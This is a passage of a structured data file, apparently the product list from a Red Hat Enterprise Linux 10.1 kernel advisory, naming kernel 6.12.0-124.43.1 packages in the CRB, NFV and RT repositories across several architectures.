"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
